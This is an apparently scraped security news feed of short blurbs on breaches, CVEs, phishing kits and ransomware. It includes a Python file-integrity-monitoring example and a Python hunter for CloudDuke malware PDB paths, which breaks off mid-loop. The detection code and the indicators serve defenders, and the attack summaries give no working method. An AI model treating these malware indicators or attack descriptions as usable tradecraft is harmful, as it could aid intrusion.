PCI DSS compliance is often seen as a one-off task, that is, you do the audit, implement controls, and then move on. But then there comes the problem - systems aren’t static, meaning that files, scripts, and configurations change constantly, and even small untracked changes can create gaps that lead to non-compliance or security issues. This is where File Integrity Monitoring (FIM) comes in. It tracks critical files, system binaries, scripts, and configs in real time, alerting when anything changes unexpectedly. For PCI DSS, this is exactly what’s required, from preventing unauthorized changes...

Are We Failing to Secure Files? Attackers Aren’t Failing to Check

According to a new Ponemon study, weak file protections now account for several cybersecurity incidents a year for many organizations. Unsafe file-sharing practices, malicious vendor files, weak access controls, and obscured file activity are largely to blame. File Integrity Monitoring (FIM) could be the solution. Are Files Safe in Transit? More Than Half Unsure You know something’s wrong when more people feel better about downloading files from unknown sources than they do about file uploads or transfers. Over 50% were unsure if files sent via email, transferred via third parties, or...

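The two items above describe what File Integrity Monitoring does (baseline the critical files, alert on unexpected change) without showing the mechanics. The following is an added example written for this page, not Tripwire's product code: it hashes every regular file under a root, records size and permission bits alongside the hash, persists the baseline as JSON, and diffs a later snapshot into added, removed and modified paths. The directory tree, its file names and the drift it simulates are constructed inside temporary directories.

```python
import hashlib
import json
import os
import tempfile


def file_digest(path, algo="sha256"):
    """Stream the file through the hash so large binaries never have to fit in memory."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Record hash, size and permission bits for every regular file under root.

    Keys are root-relative POSIX-style paths so a baseline taken on one host can be
    compared with one taken on another. Symlinks are skipped rather than followed.
    """
    baseline = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue
            st = os.stat(full)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = {
                "sha256": file_digest(full),
                "size": st.st_size,
                "mode": oct(st.st_mode & 0o7777),  # a permission change counts as a change
            }
    return baseline


def save_baseline(baseline, path):
    with open(path, "w", encoding="utf-8") as f:
        json.dump(baseline, f, indent=2, sort_keys=True)


def load_baseline(path):
    with open(path, encoding="utf-8") as f:
        return json.load(f)


def compare(old, new):
    """Diff two baselines into the three buckets an auditor asks about."""
    old_paths, new_paths = set(old), set(new)
    return {
        "added": sorted(new_paths - old_paths),
        "removed": sorted(old_paths - new_paths),
        "modified": sorted(p for p in old_paths & new_paths if old[p] != new[p]),
    }


def _write(root, rel, text):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as f:
        f.write(text)


def demo():
    """Constructed scenario: baseline a small tree, simulate drift, report the diff."""
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as store:
        _write(root, "etc/app.conf", "db_host=10.0.0.5\nlog_level=info\n")
        _write(root, "bin/cardproc", "#!/bin/sh\necho processing\n")
        _write(root, "www/index.php", "<?php echo 'ok';\n")
        baseline_path = os.path.join(store, "baseline.json")
        save_baseline(build_baseline(root), baseline_path)
        # simulated drift: a config edit, a stray script in the webroot, a missing binary
        _write(root, "etc/app.conf", "db_host=10.0.0.5\nlog_level=debug\n")
        _write(root, "www/unexpected.php", "<?php // nobody deployed this\n")
        os.remove(os.path.join(root, "bin", "cardproc"))
        return compare(load_baseline(baseline_path), build_baseline(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Keeping the baseline off the monitored host (or at least outside the monitored tree) matters: a baseline an attacker can rewrite alongside the files it covers proves nothing. In production the comparison runs on a schedule or from inotify-style events; the diff logic is the same.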
Beyond VDI: Security Patterns for BYOD and Contractors in 2025

Remote work is no longer a contingency – it’s the operating norm. Yet the security posture for that work often leans on virtual desktops as a default, even when the workforce is dominated by bring‑your‑own‑device (BYOD) users and short‑term contractors. Virtual desktop infrastructure (VDI) can centralize risk, but it can also centralize failure, expand the admin plane, and add latency that users will work around. This piece examines when VDI stops being the safest choice and what to use instead. I’ll compare concrete control patterns, such as secure local enclaves, strong identity guardrails...

Vulnerability Management and Patch Management: How They Work Together

Vulnerability management and patch management are often spoken of in the same breath. Yet they are not the same. Each serves a distinct purpose, and knowing the difference is more than a matter of semantics; it’s a matter of security. Confuse them, and gaps appear. Leave those gaps, and attackers will find them. To build a strong defense, you need to see how these two processes fit together. One scans the horizon for weaknesses. The other arms you with fixes. Both are vital, but neither can do the other’s job. Let’s take a closer look at what they mean, how they differ, and how they work in...

Understanding the OWASP AI Maturity Assessment

Today, almost all organizations use AI in some way. But while it creates invaluable opportunities for innovation and efficiency, it also carries serious risks. Mitigating these risks and ensuring responsible AI adoption relies on mature AI models, guided by governance frameworks. The OWASP AI Maturity Assessment Model (AIMA) is one of the most practical. In this article, we’ll explore what it is, how it compares to other frameworks, and how organizations can use it to assess their AI maturity. What is the OWASP AI Maturity Assessment Model? The OWASP AI Maturity Assessment Model is a...

CISOs Concerned of AI Adoption in Business Environments

UK security leaders are making their voices heard. Four in five want DeepSeek under regulation. They see a tool that promises efficiency but risks chaos. Business is already under pressure. Trade disputes drag on. Interest rates remain high. Cyber threats grow. Every move to expand operations adds risk, and risk is harder to measure when AI enters the equation. AI spreads fast. It cuts costs, fills gaps, and automates mundane tasks. But it also opens hidden doors. In the UK, AI is now part of daily work. A KPMG survey showed that while 69% of employees use it, only 42% trust it. Slightly over...

When It Comes to Breaches, Boards Can’t Hide Behind CISOs Any Longer

A trend that has long been on the rise is finally having its day. A recent industry report revealed that 91% of security professionals believe that ultimate accountability for cybersecurity incidents lies with the board itself, not with CISOs or security managers. If the security discussion hadn’t fully made its way into C-suite conversations before, it has now. The Chartered Institute of Information Security (CIISEC)’s new State of the Security Profession survey checks the pulse of the industry where cybersecurity regulation is concerned. It emerges with one clear, overarching sentiment: “the...

Windows 10 Retirement: A Reminder for Managing Legacy Industrial Control Systems (ICS)

On October 14th, Windows 10 will be retired, and Microsoft will no longer push patches or updates to systems on that operating system. It is crucial for companies to make the jump to Windows 11 now—or risk being exposed to critical vulnerabilities. This is especially important for Industrial Control Systems (ICS), which often run on legacy systems. Failing to transition could mean putting components like PLCs (Programmable Logic Controllers), SCADA (Supervisory Control and Data Acquisition) systems, HMIs (Human-Machine Interfaces) and the critical infrastructure they support at risk. What...

DOJ lauds series of gains against North Korean IT worker scheme, crypto thefts

Federal prosecutors secured five guilty pleas from people who supported overseas remote IT workers, and seized $15 million in stolen cryptocurrency tied to the North Korean regime.

The post DOJ lauds series of gains against North Korean IT worker scheme, crypto thefts appeared first on CyberScoop.

China’s ‘autonomous’ AI-powered hacking campaign still required a ton of human work

Anthropic and AI security experts told CyberScoop that, behind the hype, effective AI-driven cyberattacks still require skilled humans, and that the attack may have been carried out partly to send a message about what is possible.

The post China’s ‘autonomous’ AI-powered hacking campaign still required a ton of human work appeared first on CyberScoop.

Google, researchers see signs that Lighthouse text scammers disrupted after lawsuit

SecAlliance and Silent Push confirmed that the suspected Chinese operators of the phishing kit appear to have been affected.

The post Google, researchers see signs that Lighthouse text scammers disrupted after lawsuit appeared first on CyberScoop.

The retail sector needs a cybersecurity talent incubator

Retailers are exposed to cyber attacks – and personnel, not tech, is the answer.

The post The retail sector needs a cybersecurity talent incubator appeared first on CyberScoop.

FBI calls Akira ‘top five’ ransomware variant out of 130 targeting US businesses

Officials shared indicators of compromise observed as recently as this month to help organizations hunt for and defend against the ransomware group, which has pocketed $244 million as of late September.

The post FBI calls Akira ‘top five’ ransomware variant out of 130 targeting US businesses appeared first on CyberScoop.

Washington Post confirms data on nearly 10,000 people stolen from its Oracle environment

The newspaper said a “bad actor” contacted the company in late September, prompting an investigation that nearly a month later confirmed the extent of compromise.

The post Washington Post confirms data on nearly 10,000 people stolen from its Oracle environment appeared first on CyberScoop.

Operation Endgame targets malware networks in global crackdown

Rhadamanthys, VenomRAT, and the Elysium botnet were targeted in the takedowns.

The post Operation Endgame targets malware networks in global crackdown appeared first on CyberScoop.

Congressional Dems press governors to block feds from accessing state DMV data

Forty House and Senate members tell Democratic governors they may not be aware of how much they’re sharing with ICE and other immigration agencies.

The post Congressional Dems press governors to block feds from accessing state DMV data appeared first on CyberScoop.

While White House demands deterrence, Trump shrugs

Trump’s dismissive remarks on cyber threats contrast sharply with his administration’s official calls for action.

The post While White House demands deterrence, Trump shrugs appeared first on CyberScoop.

Google files lawsuit against Lighthouse ‘phishing for dummies’ text scammers

The suspected Chinese schemers behind it enable those constant fake E-Z Pass and U.S. Postal Service smishing messages.

The post Google files lawsuit against Lighthouse ‘phishing for dummies’ text scammers appeared first on CyberScoop.

Anthropic: China-backed hackers launch first large-scale autonomous AI cyberattack

China-linked threat actors used Anthropic’s AI to automate and execute cyberattacks in a highly sophisticated espionage campaign in September 2025. The cyber spies leveraged advanced “agentic” capabilities rather than using AI only for guidance. Attackers […]

Multiple Vulnerabilities in GoSign Desktop lead to Remote Code Execution

Researchers found critical vulnerabilities in GoSign Desktop: TLS certificate validation is disabled and the update mechanism is unsigned. GoSign is an advanced and qualified electronic signature solution developed by Tinexta InfoCert S.p.A., used by public administrations, businesses, and professionals to manage approval workflows with traceability and security. The SaaS/web version of the product has received the “QC2” […]

U.S. CISA adds Fortinet FortiWeb flaw to its Known Exploited Vulnerabilities catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Fortinet FortiWeb flaw, tracked as CVE-2025-64446 (CVSS score of 9.1), to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerability is a relative path traversal issue in Fortinet FortiWeb 8.0.0 […]

Critical CVE-2025-59367 flaw lets hackers access ASUS DSL routers remotely

ASUS patched a critical auth-bypass flaw, tracked as CVE-2025-59367 (CVSS score of 9.3), in multiple DSL routers that allows remote, unauthenticated attackers to easily access unpatched devices. The vulnerability impacts the DSL-AC51, DSL-N16 and DSL-AC750 router families, the […]

Millions of sites at risk from Imunify360 critical flaw exploit

A vulnerability in ImunifyAV/Imunify360 allows attackers to upload malicious files to shared servers and execute arbitrary code, potentially exposing millions of websites, cybersecurity firm Patchstack warns. The flaw in Imunify360 AV before v32.7.4.0 lets attacker‑supplied malware trigger dangerous PHP […]

Critical FortiWeb flaw under attack, allowing complete compromise

A Fortinet FortiWeb auth-bypass flaw is being actively exploited, allowing attackers to hijack admin accounts and fully compromise devices. Researchers warn of an authentication bypass flaw in Fortinet FortiWeb WAF that allows full device takeover. The cybersecurity vendor addressed the vulnerability with the release of version 8.0.2. A security flaw lets anyone break into FortiWeb devices […]

Read More
Germany’s BSI issues guidelines to counter evasion attacks targeting LLMs
Germany’s BSI issues guidelines to counter evasion attacks targeting LLMs

Germany’s BSI warns of rising evasion attacks on LLMs, issuing guidance to help developers and IT managers secure AI systems. Germany’s BSI warns of rising evasion attacks on LLMs, issuing guidance to help developers and IT managers secure AI systems and mitigate related risks. A significant and evolving threat to AI systems based on large […]

Read More
Washington Post notifies 10,000 individuals affected in Oracle-linked data theft
Washington Post notifies 10,000 individuals affected in Oracle-linked data theft

The Washington Post alerts nearly 10,000 employees and contractors that personal and financial data was exposed in the Oracle breach. The Washington Post warns nearly 10,000 staff and contractors that personal and financial data was exposed in the Oracle breach. The popular newspaper has approximately 2.5M digital subscribers. Between July 10 and August 22, threat […]

Read More
Chrome extension “Safery” steals Ethereum wallet seed phrases
Chrome extension “Safery” steals Ethereum wallet seed phrases

Malicious Chrome extension “Safery: Ethereum Wallet” steals users’ seed phrases while posing as a legit crypto wallet still available online. Socket’s Threat Research Team discovered a malicious Chrome extension called “Safery: Ethereum Wallet,” posing as a legitimate crypto wallet but designed to steal users’ seed phrases. The Chrome extension was uploaded to the Chrome Web […]

Read More
A new round of Europol’s Operation Endgame dismantled Rhadamanthys, Venom RAT, and Elysium botnet
A new round of Europol’s Operation Endgame dismantled Rhadamanthys, Venom RAT, and Elysium botnet

Europol’s Operation Endgame dismantles Rhadamanthys, Venom RAT, and Elysium botnet in a global crackdown on cybercriminal infrastructures. Europol and Eurojust have launched a new phase of Operation Endgame, carried out between November 10 and 13, 2025, dismantling major malware families including Rhadamanthys Stealer, Venom RAT, and the Elysium botnet as part of a global effort […]

Read More
Keeper Security Unveils Secure Secrets Management in Visual Studio Code
Keeper Security Unveils Secure Secrets Management in Visual Studio Code

Keeper Security has announced the launch of its Visual Studio Code (VS Code) extension, extending its enterprise-grade secrets management directly into developers’ coding environments. The VS Code extension expands the KeeperPAM® platform’s reach into the developer ecosystem, enabling secure, zero-trust secrets management throughout the software development lifecycle. Effective secrets management is vital for developers, as […]

The post Keeper Security Unveils Secure Secrets Management in Visual Studio Code appeared first on IT Security Guru.

Read More
What Will Defense Contracting Look Like in 10 Years?
What Will Defense Contracting Look Like in 10 Years?

Global defense spending will reach $6.38 trillion by 2035, growing from $2.7 trillion in 2024 at a compound annual growth rate of 8.13%, according to Spherical Insights & Consulting research. This massive expansion coincides with fundamental shifts in how the U.S. government procures defense capabilities and manages contractor relationships. Margarita Howard, CEO and owner of […]

The post What Will Defense Contracting Look Like in 10 Years? appeared first on IT Security Guru.

Read More
Black Duck SCA Adds AI Model Scanning to Strengthen Software Supply Chain Security
Black Duck SCA Adds AI Model Scanning to Strengthen Software Supply Chain Security

Black Duck has expanded its software composition analysis (SCA) capabilities to include AI model scanning, helping organisations gain visibility into the growing use of open-source AI models embedded in enterprise software. With the release of version 2025.10.0, the company’s new AI Model Risk Insights capability allows teams to identify and analyse AI models used within […]

The post Black Duck SCA Adds AI Model Scanning to Strengthen Software Supply Chain Security appeared first on IT Security Guru.

Read More
Quantum Route Redirect: The Phishing Tool Simplifying Global Microsoft 365 Attacks
Quantum Route Redirect: The Phishing Tool Simplifying Global Microsoft 365 Attacks

The team at KnowBe4 Threat Labs has uncovered an emerging advanced phishing campaign targeting Microsoft 365 users globally to steal their credentials. This powerful new phishing kit, which KnowBe4 has named ‘Quantum Route Redirect’, was initially discovered in early August. Quantum Route Redirect comes with a pre-configured setup and phishing domains that significantly simplifies […]

The post Quantum Route Redirect: The Phishing Tool Simplifying Global Microsoft 365 Attacks appeared first on IT Security Guru.

Read More
Staying Safe After a Cyber Attack
Staying Safe After a Cyber Attack

One minute, everything’s fine. The next? Something feels off. Maybe there’s an unfamiliar charge on your bank account, or an email says your password has been changed, except you didn’t do it. Or perhaps your social media starts posting things you’ve never written. The first reaction is disbelief. Then confusion. Then fear. Take a breath. […]

The post Staying Safe After a Cyber Attack appeared first on IT Security Guru.

Read More
Keeper Security launches Forcefield to defend against memory-based attacks on Windows devices
Keeper Security launches Forcefield to defend against memory-based attacks on Windows devices

Keeper Security has unveiled Keeper Forcefield™, a new kernel-level endpoint security product designed to stop one of the fastest-growing cyber threats: memory-based attacks. The company, known for its zero-trust and zero-knowledge Privileged Access Management (PAM) platform, says Forcefield is the first solution to deliver real-time memory protection at both the user and kernel levels, offering […]

The post Keeper Security launches Forcefield to defend against memory-based attacks on Windows devices appeared first on IT Security Guru.

Read More
How Defence Contractors Are Fortifying Security Camera Networks For High-Stakes Live Events
How Defence Contractors Are Fortifying Security Camera Networks For High-Stakes Live Events

In an era where security threats, hacks, and even assassination attempts at major political events have become an urgent concern, Active Security has taken a fundamentally different approach to protecting large, stadium-level gatherings: building high-fidelity camera networks where compromising one device doesn’t give attackers access to everything else. These networks are designed to integrate seamlessly […]

The post How Defence Contractors Are Fortifying Security Camera Networks For High-Stakes Live Events appeared first on IT Security Guru.

Read More
Nearly Three-Quarters of US CISOs Faced Significant Cyber Incident in the Past Six Months, Research Finds
Nearly Three-Quarters of US CISOs Faced Significant Cyber Incident in the Past Six Months, Research Finds

A new research report from Nagomi Security has revealed that, over the past six months, nearly three quarters (73%) of US CISOs have reported a significant cyber incident. The 2025 CISO Pressure Index emphasises how continuous widespread breaches and rising internal strain are reshaping the Chief Information Security Officer (CISO) role. Nagomi’s 2025 CISO Pressure Index […]

The post Nearly Three-Quarters of US CISOs Faced Significant Cyber Incident in the Past Six Months, Research Finds appeared first on IT Security Guru.

Read More
Arnica’s Arnie AI Reimagines Application Security For The Agentic Coding Era
Arnica’s Arnie AI Reimagines Application Security For The Agentic Coding Era

As software development enters an era dominated by autonomous coding agents, application security programs are finding themselves structurally unprepared. AI models that generate and modify production code on demand can push thousands of changes per day, far beyond what traditional AppSec pipelines were built to handle. Arnica has stepped into this gap with Arnie AI, […]

The post Arnica’s Arnie AI Reimagines Application Security For The Agentic Coding Era appeared first on IT Security Guru.

Read More
New Forescout report finds 65% of connected assets are outside traditional IT visibility
New Forescout report finds 65% of connected assets are outside traditional IT visibility

Forescout® Technologies, a global leader in cybersecurity, has announced the launch of eyeSentry, a new cloud-native exposure management solution designed to help enterprises continuously uncover and mitigate hidden risks across IT, Internet of Things (IoT), and Internet of Medical Things (IoMT) environments. As organisations continue to embrace hybrid and cloud infrastructures, traditional vulnerability management methods […]

The post New Forescout report finds 65% of connected assets are outside traditional IT visibility appeared first on IT Security Guru.

Read More
Tycoon 2FA Phishing Kit Analysis
Tycoon 2FA Phishing Kit Analysis

The Tycoon 2FA phishing kit is a sophisticated Phishing-as-a-Service (PhaaS) platform that emerged in August 2023, designed to bypass two-factor authentication (2FA) and multi-factor authentication (MFA) protections, primarily targeting Microsoft 365 and Gmail accounts. Utilizing an Adversary-in-the-Middle (AiTM) approach, it employs a reverse proxy server to host deceptive phishing pages that mimic legitimate login interfaces, capturing user credentials and session cookies in real time. According to the Any.run malware trends tracker, Tycoon 2FA leads with over 64,000 reported incidents this year.

Read More
From Scripts to Systems: A Comprehensive Look at Tangerine Turkey Operations
From Scripts to Systems: A Comprehensive Look at Tangerine Turkey Operations

Cybereason Security Services issues Threat Analysis reports to inform on impactful threats. The Threat Analysis reports investigate these threats and provide practical recommendations for protecting against them.

In this Threat Analysis report, Cybereason Security Services investigates the flow of a Tangerine Turkey campaign observed in Cybereason EDR. Tangerine Turkey is a threat actor identified by a Visual Basic Script (VBS) worm used to facilitate cryptomining activity.

Read More
Cybereason TTP Briefing Q3 2025: LOLBINs and CVE Exploits Dominate
Cybereason TTP Briefing Q3 2025: LOLBINs and CVE Exploits Dominate

Explore the latest trends, techniques, and procedures (TTPs) our incident response (IR) experts are actively facing with the TTP Briefing Q3 2025, a report built on frontline threat intelligence from our global incident response investigations, enriched by noteworthy detections from our SOC. 

Read More
Addressing CL0P Extortion Campaign Targeting Oracle EBS CVE-2025-61882
Addressing CL0P Extortion Campaign Targeting Oracle EBS CVE-2025-61882

Cybereason is continuing to investigate. Check the Cybereason blog for additional updates.

Last update: Oct 7, 11am EST


Overview and What Cybereason Knows So Far

  • July 2025: Oracle releases security updates including 309 patches, nine of which addressed flaws/vulnerabilities in Oracle E-Business Suite (EBS).
  • Late July 2025 through early September 2025: based on emerging evidence and ongoing forensic investigations, Cybereason has assessed that CL0P orchestrated an intrusion path that allowed unauthorized access to on-premise, customer-managed Oracle E-Business Suite (EBS) solutions, enumerated accessible and stored data, and conducted data exfiltration.
  • Late September 2025 through early October 2025: a widespread, orchestrated email extortion campaign emerged targeting users of on-premise, customer-managed Oracle E-Business Suite (EBS), requesting contact with CL0P in order to not expose data allegedly exfiltrated.
  • Early October 2025: Cybereason is aware of ongoing investigations in which CL0P has provided proof of data. CL0P does not appear to have named new victims associated with this incident as of October 4, 2025.
  • October 5, 2025: Oracle confirms CVE-2025-61882 in Oracle E-Business Suite (EBS). This vulnerability is remotely exploitable without authentication (i.e., it can be exploited over a network without the need for a username and password). Successful exploitation can lead to remote code execution (RCE).
  • October 7, 2025: Cybereason confirms that the earliest evidence of threat actor activity occurred on August 9; this is subject to change based on ongoing investigations.

Read More
7000+ IRs Later: The 11 Essential Cybersecurity Controls
7000+ IRs Later: The 11 Essential Cybersecurity Controls

Decades in incident response reveal battle-tested cybersecurity controls that minimize attack surface, improve detection and response, reduce incident impact and losses, and build cyber resilience (with compliance mappings for easy implementation).

Read More
Behind the Mask of Madgicx Plus: A Chrome Extension Campaign Targeting Meta Advertisers
Behind the Mask of Madgicx Plus: A Chrome Extension Campaign Targeting Meta Advertisers

Cybereason Security Services recently analyzed a broader malicious Chrome extension campaign, part of which had been previously documented by DomainTools. While earlier iterations of this campaign involved the impersonation of a variety of services, the latest version shifts focus to Meta (Facebook/Instagram) advertisers through a newly crafted lure: “Madgicx Plus,” a fake AI-driven ad optimization platform. Promoted as a tool to streamline campaign management and boost ROI using artificial intelligence, the extension instead delivers potentially malicious functionalities capable of hijacking business sessions, stealing credentials, and compromising Meta Business accounts. Notably, several domains associated with earlier parts of the campaign have been repurposed to promote this new theme, highlighting the operators’ tendency to recycle infrastructure while adapting their social engineering strategy to new targets.

Read More
CVE-2025-53770 & CVE-2025-53771: Critical On-Prem SharePoint Vulnerabilities
CVE-2025-53770 & CVE-2025-53771: Critical On-Prem SharePoint Vulnerabilities

Cybereason is actively investigating exploitation attempts of these vulnerabilities. Check the Cybereason blog for additional updates.

Key Takeaways

  • Two zero-day vulnerabilities discovered in on-premise Microsoft SharePoint servers, tracked as CVE-2025-53770 and CVE-2025-53771.
  • Affected versions include: Subscription Edition – KB5002768, SharePoint 2019 – KB5002754, SharePoint 2016 – KB5002760.
  • If exploited, these vulnerabilities could allow for remote code execution (RCE).
  • Cybereason has observed ongoing active exploitation attempts of these vulnerabilities through our Global SOC monitoring.
  • Given this exploit, we recommend taking an “assume compromised” posture, immediately patching impacted versions, and conducting a historical incident response look-back.

Read More
BlackSuit: A Hybrid Approach with Data Exfiltration and Encryption
BlackSuit: A Hybrid Approach with Data Exfiltration and Encryption

Cybereason Security Services issues Threat Analysis reports to inform on impactful threats. The Threat Analysis reports investigate these threats and provide practical recommendations for protecting against them.

Read More
Deploying NetSupport RAT via WordPress & ClickFix
Deploying NetSupport RAT via WordPress & ClickFix

In May 2025, Cybereason Global Security Operations Center (GSOC) detected that threat actors have been hosting malicious WordPress websites to deliver malicious versions of the legitimate NetSupport Manager Remote Access Tool (RAT). 

Read More
Introducing the Cybereason TTP Briefing: Frontline Threat Intelligence Insights
Introducing the Cybereason TTP Briefing: Frontline Threat Intelligence Insights

Gain insight into the latest attack trends, techniques, and procedures our Incident Response experts are actively facing with the brand new TTP Briefing, a report built on frontline threat intelligence from our global incident response (IR) investigations, enriched by noteworthy detections from our SOC. 

Read More
How to spot a holiday shopping scam: Fake deals, trick surveys & bogus gift cards
How to spot a holiday shopping scam: Fake deals, trick surveys & bogus gift cards

Scammers, fraudsters, and phishers take advantage of every season. But the holiday shopping season - which includes Black Friday, Cyber Monday, and Christmas - may be their favorite.

As retailers rush to capitalize on what is generally their most profitable time of year, they will generally flood email boxes with great offers that are often time sensitive and may even seem too-good-to-be-true. Meanwhile, consumers also feel the urgency to get their shopping done, along with the stresses of work and family. Add in the financial pressure of an inflationary economy and the likelihood of making a quick mistake keeps increasing. Read on for some simple yet effective ways to ruin the scammers' fun as you celebrate the season of giving.

Read More
Soon…
Soon…

Posted by Sean @ 12:52 GMT


Our "construction project" is progressing nicely.

A work in progress

And it should resolve this…

Mobile usability issues

Fix mobile usability issues?

Translation: your site doesn't help us sell more Android phones and ads.

But whatever, the "issues" should be fixed soon enough.




On 18/08/15 At 12:52 PM

Read More
Work In Progress
Work In Progress

Posted by Sean @ 13:25 GMT


Regular readers will have noticed it's been slow here of late.

Under Construction

We're finally undertaking an upgrade from Greymatter 1.7.3. This may be the world's oldest Greymatter blog… that will now change.

More info coming soon.

In the meantime, you can still catch us on Twitter.




On 13/08/15 At 01:25 PM

Read More
"IOS Crash Report" Update: Safari Adds Block Feature

Posted by Sean @ 09:53 GMT


Ask, and sometimes, you shall receive.

Last Friday, we wrote about call center scammers targeting iOS. And today, Apple released a new (beta) feature that should help.

Apple released iOS 9 Public Beta 2:

iOS 9 Public Beta 2, Install

And it appears that one of Safari's new features allows people to block fraud-focused JavaScript.

iOS 9 Public, Safari Block Alerts

We tested a scam-site and after a few attempts to dismiss the JavaScript dialog, Safari included a prompt to "Block Alerts". We were then easily able to close the page.

Kudos Apple! Looking forward to seeing this in iOS 9's general release.

Big hat tip to Rosyna Keller.




On 23/07/15 At 09:53 AM

Read More
Duke APT group's latest tools: cloud services and Linux support
Duke APT group's latest tools: cloud services and Linux support

Posted by Artturi @ 11:59 GMT


Recent weeks have seen the outing of two new additions to the Duke group's toolset, SeaDuke and CloudDuke. Of these, SeaDuke is a simple trojan made interesting by the fact that it's written in Python. And even more curiously, SeaDuke, with its built-in support for both Windows and Linux, is the first cross-platform malware we have observed from the Duke group. While SeaDuke is a single - albeit cross-platform - trojan, CloudDuke appears to be an entire toolset of malware components, or "solutions" as the Duke group apparently calls them. These components include a unique loader, downloader, and not one but two different trojan components. CloudDuke also greatly expands on the Duke group's usage of cloud storage services, specifically Microsoft's OneDrive, as a channel for both command and control as well as the exfiltration of stolen data. Finally, some of the recent CloudDuke spear-phishing campaigns have borne a striking resemblance to CozyDuke spear-phishing campaigns from a year ago.

Linux support added with the cross-platform SeaDuke malware

Last week, both Symantec and Palo Alto Networks published research on SeaDuke, a newer addition to the arsenal of trojans being used by the Duke group. While older malware by the Duke group has always been written with a combination of the C and C++ programming languages as well as assembly language, SeaDuke is peculiarly written in Python with multiple layers of obfuscation. This Python code is usually then compiled into Windows executables using py2exe or pyinstaller. However, the Python code itself has been designed to work on both Windows and Linux. We therefore suspect that the Duke group is also using the same SeaDuke Python code to target Linux victims. This is the first time we have seen the Duke group employ malware to target Linux platforms.

[Image: seaduke_crossplatform] An example of the cross-platform support found in SeaDuke.

A new set of solutions with the CloudDuke malware toolset

Last week, we also saw Palo Alto Networks and Kaspersky Labs publish research on malware components they respectively called MiniDionis and CloudLook. MiniDionis and CloudLook are both components of a larger malware toolset we call CloudDuke. This toolset consists of malware components that provide varying functionality while partially relying on a shared code framework and always using the same loader. Based on PDB strings found in the samples, the malware authors refer to the CloudDuke components as "solutions" with names such as "DropperSolution", "BastionSolution" and "OneDriveSolution". A list of PDB strings we have observed is below:

  • C:\DropperSolution\Droppers\Projects\Drop_v2\Release\Drop_v2.pdb
  • c:\BastionSolution\Shells\Projects\miniDionis4\miniDionis\obj\Release\miniDionis.pdb
  • c:\BastionSolution\Shells\Projects\miniDionis2\miniDionis\obj\Release\miniDionis.pdb
  • c:\OneDriveSolution\Shells\Projects\OneDrive2\OneDrive\obj\x64\Release\OneDrive.pdb
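A small PDB-path hunt built around the naming convention above, as an added example that is not F-Secure's code: it pulls paths out of CodeView "RSDS" debug records (signature, 16-byte GUID, 4-byte age, NUL-terminated path) and from loose strings, matches the four listed paths exactly, and flags any other `<Name>Solution\` path as a suspected variant. The sample buffer and the `LoaderSolution` path in it are constructed for the demonstration and are not real indicators.

```python
"""Hunt raw binary data for CloudDuke-style PDB paths (added example, not F-Secure's code)."""
import re
import struct
from typing import Dict, List, Optional, Tuple

# The four PDB paths listed in the post, keyed to the CloudDuke component they name.
KNOWN_PDB_PATHS: Dict[str, str] = {
    r"C:\DropperSolution\Droppers\Projects\Drop_v2\Release\Drop_v2.pdb": "DropperSolution",
    r"c:\BastionSolution\Shells\Projects\miniDionis4\miniDionis\obj\Release\miniDionis.pdb": "BastionSolution",
    r"c:\BastionSolution\Shells\Projects\miniDionis2\miniDionis\obj\Release\miniDionis.pdb": "BastionSolution",
    r"c:\OneDriveSolution\Shells\Projects\OneDrive2\OneDrive\obj\x64\Release\OneDrive.pdb": "OneDriveSolution",
}

# Generic form of the convention: <drive>:\<Name>Solution\...\<file>.pdb (ASCII only, bounded length).
SOLUTION_PATH_RE = re.compile(
    rb"[A-Za-z]:\\([A-Za-z0-9_]+Solution)\\[\x20-\x7e]{1,200}?\.pdb", re.IGNORECASE
)

# CodeView 7 record layout: b"RSDS" + GUID(16) + age(4) + NUL-terminated path.
RSDS_HEADER_LEN = 4 + 16 + 4


def extract_rsds_pdb_paths(data: bytes) -> List[str]:
    """Return every PDB path carried in an RSDS CodeView record inside `data`."""
    paths: List[str] = []
    offset = 0
    while True:
        idx = data.find(b"RSDS", offset)
        if idx == -1:
            break
        start = idx + RSDS_HEADER_LEN
        end = data.find(b"\x00", start)
        if end != -1:
            try:
                path = data[start:end].decode("ascii")
            except UnicodeDecodeError:
                path = ""
            if path.lower().endswith(".pdb"):
                paths.append(path)
        offset = idx + 4  # keep scanning; "RSDS" may also occur as plain data
    return paths


def extract_loose_pdb_paths(data: bytes) -> List[str]:
    """Fallback: any string matching the <Name>Solution\\ convention, regardless of RSDS framing."""
    return [m.group(0).decode("ascii") for m in SOLUTION_PATH_RE.finditer(data)]


def classify_pdb_path(path: str) -> Optional[Tuple[str, str]]:
    """Map a PDB path to (verdict, component); None when it does not fit the convention."""
    for known, component in KNOWN_PDB_PATHS.items():
        if path.lower() == known.lower():
            return ("known_cloudduke", component)
    m = SOLUTION_PATH_RE.fullmatch(path.encode("ascii", "replace"))
    if m:
        return ("suspected_variant", m.group(1).decode("ascii"))
    return None


def hunt(data: bytes) -> List[dict]:
    """Combine both extractors, classify each distinct path, and report the hits in order found."""
    seen: Dict[str, dict] = {}
    for path in extract_rsds_pdb_paths(data) + extract_loose_pdb_paths(data):
        verdict = classify_pdb_path(path)
        if verdict and path not in seen:
            seen[path] = {"path": path, "verdict": verdict[0], "component": verdict[1]}
    return list(seen.values())


# Constructed sample buffer (not a real sample): a fake header, one RSDS record carrying a listed
# BastionSolution path, and a hypothetical "LoaderSolution" path that only matches the convention.
SAMPLE_BLOB = (
    b"MZ\x90\x00" + b"\x00" * 32
    + b"RSDS" + bytes(range(16)) + struct.pack("<I", 1)
    + rb"c:\BastionSolution\Shells\Projects\miniDionis4\miniDionis\obj\Release\miniDionis.pdb" + b"\x00"
    + b"\x00" * 16
    + rb"C:\LoaderSolution\Projects\Loader\Release\Loader.pdb" + b"\x00"  # hypothetical variant
    + b"Z.Crypto\x00"
)

if __name__ == "__main__":
    for hit in hunt(SAMPLE_BLOB):
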